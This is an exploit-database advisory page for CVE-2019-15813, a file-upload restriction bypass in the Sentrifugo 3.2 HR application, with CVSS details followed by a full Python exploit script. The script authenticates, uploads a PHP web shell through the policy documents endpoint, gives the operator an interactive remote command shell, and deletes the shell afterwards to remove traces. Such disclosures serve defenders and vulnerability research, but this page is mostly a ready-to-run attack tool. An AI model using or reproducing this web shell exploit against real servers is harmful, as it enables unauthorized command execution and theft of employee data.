Sentrifugo 3.2 Shell Upload / Restriction Bypass

2020.10.27
Credit: Gurkirat Singh
Risk: High
Local: No
Remote: Yes
CVE: CVE-2019-15813
CWE: CWE-264


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated) # Date: 26/10/2020 # Exploit Author: Gurkirat Singh <tbhaxor@gmail.com> # Vendor Homepage: http://www.sentrifugo.com/ # POC Link: https://www.exploit-db.com/exploits/47323 # Version: 3.2 # Tested on: Linux and Windows # CVE : CVE-2019-15813 # Contact Details: https://google.com/search?q=tbhaxor from argparse import ArgumentParser, RawTextHelpFormatter from bs4 import BeautifulSoup, Tag from requests.sessions import Session import tempfile as tmp import os.path as path import random import string from huepy import * parser = ArgumentParser(description="Exploit for CVE-2019-15813", formatter_class=RawTextHelpFormatter) parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t") parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u") parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p") args = parser.parse_args() if args.t.endswith("/"): args.t = args.t[:-1] F = "".join(random.choices(string.ascii_letters, k=13)) + ".php" with Session() as http: print(run("Logging in")) data = {"username": args.u, "password": args.p} r = http.post(args.t + "/index.php/index/loginpopupsave", data=data, allow_redirects=False) if not (r.headers.get("Location", "").endswith("welcome") or r.headers.get("Location", "").endswith("welcome/")): print(bad("Unable to login. Check username / password")) exit(1) print(good("Logged in")) print(run("Exploiting")) files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")} r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files) if r.status_code != 200: print(bad("Unable to upload file")) exit(1) file_name = r.json()["filedata"]["new_name"] print(info("Spawning shell")) user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "whoami"}) host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "cat /etc/hostname"}) shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}" while True: try: cmd = input(shell) if cmd == "exit": break r = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": cmd}) print(r.content.decode().strip()) except Exception as e: print() break print(run("Cleaning")) http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "rm %s" % file_name}) r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name) if r.status_code == 404: print(good("Cleaned")) else: print(bad("Unable to clean the file"))


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top